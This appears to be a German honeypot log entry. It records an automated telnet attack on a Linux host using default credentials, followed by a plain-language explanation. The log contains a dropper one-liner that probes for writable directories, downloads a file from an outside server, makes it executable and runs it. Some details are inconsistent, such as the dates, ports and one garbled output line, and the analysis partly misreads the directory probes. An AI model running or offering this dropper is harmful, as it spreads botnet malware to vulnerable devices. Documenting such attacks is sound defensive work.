01.10.2026, 11:50 UTC · 12 Befehle · über telnet · Pakistan · 3× wiederholt
user='' pass='root' root@srv01:~$ 1111 bash: 1111: command not found root@srv01:~$ start bash: start: command not found root@srv01:~$ enable bash: enable: command not found root@srv01:~$ config terminal bash: config: command not found root@srv01:~$ system bash: system: command not found root@srv01:~$ linuxshell bash: linuxshell: command not found root@srv01:~$ su su: must be run from a terminal root@srv01:~$ shell bash: shell: command not found root@srv01:~$ sh root@srv01:~$ >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x47\x44\x46\x54\x4d\x59' bash: /var/run/.x: Permission denied GDFTMY root@srv01:~$ /bin/busybox wget;/bin/busybox echo -ne '\x47\x44\x46\x54\x4d\x59' wget: missing URL Usage: wget [OPTIONS]... [URL]... GDFTMY root@srv01:~$ >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://[IP]:36307/i ||curl -O http://[IP]:36307/i ||/bin/busybox wget http://[IP]:36307/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x52\x4f\x5a\x48\x48\x55\x56\x58' rm: cannot remove 'i': No such file or directory Connecting to [IP]:59751... connected. HTTP request sent, awaiting response... 200 OK Length: 4096 (4.0K) [application/octet-stream] Saving to: 'i' 0K .... 100% 2.34M=0s 2023-10-27 14:32:10 (2.34 MB/s) - 'i' saved [4096/4096] bash: ./i: Permission denied XXCZY LJ ROZHHUVX
Der Angreifer verbindet sich über Telnet mit Standardzugangsdaten und versucht, eine privilegierte Shell-Umgebung zu starten. Nach fehlgeschlagenen Versuchen, in ein Linux-Subsystem zu wechseln, leert er mehrere temporäre Verzeichnisse. Anschließend versucht er, eine Datei namens 'i' von einem externen Server herunterzuladen und ausführbar zu machen.
Die ersten Kommandos wie 'enable' und 'config terminal' sind Cisco-Befehle, die hier auf einem Linux-System scheitern. Der Befehl 'su' scheitert, da keine interaktive Terminalverbindung vorliegt. Die langen Zeilen mit '>/var/run/.x' leeren Dateien in verschiedenen Verzeichnissen, um Speicherplatz zu schaffen oder alte Spuren zu löschen. Der eigentliche Angriff erfolgt durch 'wget' oder 'curl', die eine Datei vom externen Server laden. 'chmod 777' setzt alle Rechte für diese Datei, um sie ausführen zu können.
Das Ziel ist die Installation einer Schadsoftware, vermutlich eines Botnet-Agents oder Kryptominers, auf dem Gerät. Dies erkennt man an der typischen Struktur des Download-Befehls und dem Versuch, die Datei in verschiedenen Schreibpfaden zu speichern. Die wiederholten Verbindungen deuten auf automatisierte Skripte hin, die nach verwundbaren Geräten suchen.
Dies ist ein sehr verbreiteter, automatisierter Angriff auf IoT-Geräte mit Standardpasswörtern. Die Verwendung von BusyBox und einfachen Download-Skripten ist charakteristisch für Masseninfektionen durch bekannte Malware-Familien.